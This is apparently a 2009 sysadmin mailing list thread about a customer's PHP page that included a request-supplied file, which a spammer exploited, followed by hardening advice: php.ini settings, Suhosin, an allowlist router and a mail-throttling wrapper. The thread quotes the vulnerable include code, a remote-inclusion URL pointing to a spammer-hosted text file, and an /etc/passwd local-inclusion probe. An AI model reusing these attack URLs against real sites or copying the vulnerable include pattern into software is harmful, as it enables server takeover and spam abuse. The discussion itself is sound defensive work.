Hi all
Just stopped our mail server from spitting out thousands of spam messages.
We have a customer who has a site with the following (stupid) code in his index.php:
if($called_page_link!="") { $requested_file=$called_page_link; }
include($requested_file);
The f*ing spammer found out about this and called the page with:
http://www.thestupidcustomer.xy/index.php?called_page_link=http://geocities.com/nimiuu/fuck.txt?
Boom.
Have I already told you that I hate spammers? :-)
Oh well, one down - a few million to go...
Regards,
Mike
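As an added example (this is not code from the thread or from the customer), here is the same index.php "router" rewritten so that the include path can never come from the request. It covers both the remote URL Mike saw and the /etc/passwd local inclusion raised later in the thread. Everything in it is assumed: a pages/ directory, an allowlist of three page names, a query parameter named page, and PHP 7.1 or later.

```php
<?php
// Added example, not the customer's code from the thread: the same "router"
// rewritten so that the client can only select from a fixed set of pages.
//
// Why the original is exploitable:
//   if($called_page_link!="") { $requested_file=$called_page_link; }
//   include($requested_file);
// $called_page_link is never assigned in the script, so it only has a value
// when register_globals is on and the client supplies it in the query string.
// include() then fetches whatever was passed: a remote URL (remote file
// inclusion, when allow_url_include / allow_url_fopen permit it) or a local
// path such as /etc/passwd (local file inclusion), executed or disclosed as PHP.

declare(strict_types=1);

// Assumed site layout: the includable pages live in ./pages and are listed
// here. The client sends the key; the file name never comes from the request.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];
const PAGE_DIR = __DIR__ . '/pages';

/**
 * Map a client-supplied page key to an absolute file path, or null.
 * Anything not in the allowlist is rejected outright; there is no fallback
 * to the raw parameter, which is the mistake in the original snippet.
 */
function resolve_page(string $key, array $pages = PAGES, string $dir = PAGE_DIR): ?string
{
    if (!array_key_exists($key, $pages)) {
        return null;
    }
    $base = realpath($dir);
    $path = realpath($dir . '/' . $pages[$key]);
    // Defence in depth: even an allowlisted entry must resolve to a real file
    // inside PAGE_DIR (catches a misconfigured map or a symlink pointing out).
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Read the parameter explicitly from $_GET instead of relying on
// register_globals; an absent or empty parameter means the default page.
$key  = isset($_GET['page']) && $_GET['page'] !== '' ? (string) $_GET['page'] : 'home';
$file = resolve_page($key);

if ($file === null) {
    http_response_code(404);
    exit('Not found');
}

// Belt and braces: refuse to serve at all if the php.ini hardening discussed
// in the thread is not in place, so a later regression is noticed immediately.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    error_log('allow_url_include is On; refusing to serve');
    http_response_code(500);
    exit;
}

include $file;
```

With this in place, index.php?page=http://geocities.com/... and index.php?page=/etc/passwd both end in a 404 before include() is ever reached, whatever php.ini says; the allow_url_fopen / allow_url_include settings remain worth setting, but they are no longer the only thing standing between the request and include().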
I think this is what you should have in your php.ini anyway:
allow_url_fopen = Off
/Radek

On 19.02.2009 at 16:31, Mike Kellenberger wrote:
-- Mike Kellenberger mike.kellenberger@escapenet.ch Escapenet - the Web Company Tel +41 52 235 0700 http://www.escapenet.ch Skype mikek70atwork
swinog mailing list swinog@lists.swinog.ch http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog
Kind regards
Radek Mrskos, Baechlerstr. 12, CH-8802 Kilchberg
Email: mrskos@volume.ch  Tel: +41 43 534 40 24  Mob: +41 79 219 68 66  Fax: +41 86079 2196 866  PGP: 0x8CB69F6D
totally correct, thanks! Looks like I'm the stupid SysAdmin as well... :-)
Regards,
Mike
Hey Mike
First thing to remember: never get nervous about a spammer! There are too many out there. It's just not worth your time to get angry about such things... It was our choice to become sysadmins; spam fighting is one of our big daily tasks. We might as well work for McDonald's; there's Spam there too.
Turning off allow_url_fopen and cURL might give you some headaches with customers who definitely need the option to fetch remote data. So here's my recommended setup (allow_url_include was introduced in PHP 5.2.0):
allow_url_fopen = On
allow_url_include = Off
This will protect you from the most stupid spammers, at least. Next, work on a more secure PHP setup, say running PHP as CGI with Apache's suEXEC. You should also throttle emails sent by PHP, e.g. with a simple sendmail wrapper: http://www.iezzi.ch/archives/258 http://www.iezzi.ch/archives/217
Regards, Philip
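As an added example of the throttling sendmail wrapper Philip mentions (my own, written in PHP so the page stays in one language; it is not the wrapper behind the iezzi.ch links): PHP's mail() pipes every message through whatever sendmail_path points to, so a script there can count and refuse. The real MTA path /usr/sbin/sendmail, the state directory /var/tmp/php-mail-throttle and the limit of 100 messages per hour are all assumptions.

```php
#!/usr/bin/env php
<?php
// Added example, my own and not the wrappers linked in the thread: a
// throttling sendmail wrapper written in PHP. Install it with
//   sendmail_path = "/usr/local/bin/throttle-sendmail.php"
// in php.ini; mail() then pipes every message through this script.
// Assumptions: the real MTA is /usr/sbin/sendmail, counters live in
// /var/tmp/php-mail-throttle, and the limit is 100 messages per hour.

declare(strict_types=1);

const REAL_SENDMAIL = '/usr/sbin/sendmail';
const STATE_DIR     = '/var/tmp/php-mail-throttle';
const MAX_PER_HOUR  = 100;

/**
 * Who is sending? With PHP as CGI under suEXEC (as Philip recommends) the
 * wrapper runs as the customer's own uid, so each customer gets a separate
 * counter and one compromised site cannot exhaust the others' quota. Under
 * mod_php everything runs as the web server's uid and you get one global counter.
 */
function throttle_key(): string
{
    $uid = function_exists('posix_geteuid') ? posix_geteuid() : getmyuid();
    return 'uid' . $uid;
}

/**
 * Count messages per key per hour in a small file under an exclusive lock.
 * Returns true if this message may go out. Fails closed on any error.
 */
function allow_send(string $key, int $limit, int $now, string $dir = STATE_DIR): bool
{
    if (!is_dir($dir) && !@mkdir($dir, 0700, true)) {
        return false;
    }
    $file = $dir . '/' . $key . '.' . date('YmdH', $now); // one counter per uid per hour
    $fh = @fopen($file, 'c+');
    if ($fh === false || !flock($fh, LOCK_EX)) {
        return false;
    }
    $count = (int) stream_get_contents($fh);
    $ok = $count < $limit;
    if ($ok) {
        ftruncate($fh, 0);
        rewind($fh);
        fwrite($fh, (string) ($count + 1));
    }
    flock($fh, LOCK_UN);
    fclose($fh);
    return $ok;
}

$message = stream_get_contents(STDIN);
$key = throttle_key();
if (!allow_send($key, MAX_PER_HOUR, time())) {
    // Log every refusal: a burst of these from one uid is your alert that a
    // site is being used as a spam cannon, long before the MTA queue fills up.
    error_log(sprintf('throttle-sendmail: %s over %d/hour, message dropped', $key, MAX_PER_HOUR));
    exit(75); // EX_TEMPFAIL; mail() in the calling script returns false
}

// Hand the message to the real MTA with the arguments PHP passed
// (normally "-t -i"), each one shell-escaped.
$cmd  = escapeshellcmd(REAL_SENDMAIL) . ' '
      . implode(' ', array_map('escapeshellarg', array_slice($argv, 1)));
$pipe = popen($cmd, 'w');
if ($pipe === false) {
    exit(75);
}
fwrite($pipe, $message);
exit(pclose($pipe));
```

The hourly counter files are never deleted by the script; a daily cron or tmpwatch job over the state directory takes care of that. From PHP 5.3 on, mail.log and mail.add_x_header in php.ini additionally record which script called mail(), which tells you where to look once the wrapper's log shows a uid being throttled.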
Mike Kellenberger wrote:
totally correct, thanks! Looks like I'm the stupid SysAdmin as well... :-)
Actually, this problem has been known for ages. I wonder why you are running into it just now.
But what I really realise is that this list is populated by Swiss hosting sysadmins from all the important hosters, yet they don't really share their experience and their actual problems. I mean, in my old hosting days I was glad to have some direct connections (for example via IRC) where I could just point out some troubles and solve them quickly.
So hosting sysadmins, please get together and share your minds! This list is very network related, and that is good. Probably another list would suit all the hosters better.
Cheerz, - Dan
PS: If I were still with a hoster, I would take care of that now. So maybe someone else can take the initiative.
And disable the curl module, BTW ;)
On Thu, Feb 19, 2009 at 4:41 PM, Radek Mrskos mrskos@volume.ch wrote:
That's bad coding anyway:
http://www.thestupidcustomer.xy/index.php?called_page_link=/etc/passwd
Regards Gianni
luckily in this case: it's a windows server...
regards,
mike
luckily in this very single case! :)
-----Original Message----- From: swinog-bounces@lists.swinog.ch [mailto:swinog-bounces@lists.swinog.ch] On behalf of Gianni Carafa Sent: Thursday, 19 February 2009 17:04 To: swinog@swinog.ch Subject: Re: [swinog] F*ing Spammers and stupid customer code...
Mike Kellenberger wrote: [..]
The f*ing spammer found out about this and called the page with:
http://www.thestupidcustomer.xy/index.php?called_page_link=http://geocities.com/nimiuu/fuck.txt?
http://www.hardened-php.net/suhosin/index.html
"If you are not only running your own PHP scripts but are also hosting 3rd party PHP applications for yourself or even for possible customers, then you cannot trust the code quality of the PHP applications you use."
I suggest that you install that to save yourself from a lot of problems. BTW: letting P
Debian: apt-get install php5-suhosin :)
Also apparently works on Windows.
Btw:
echo "<?php echo base64_decode('YWJ5bmVlZGFyZWFsb3ZlQHlhaG9vLmNvLnVrLHNoYXJuaW5hbUBsaXZlLmNvLnVr'); ?>" | php
abyneedarealove@yahoo.co.uk,sharninam@live.co.uk
You might want to get those accounts shut down by contacting their abuse departments.
Besides all that, rate limiting, alerting and monitoring of outbound SMTP from sources you do not fully control is always a great idea.
Greets, Jeroen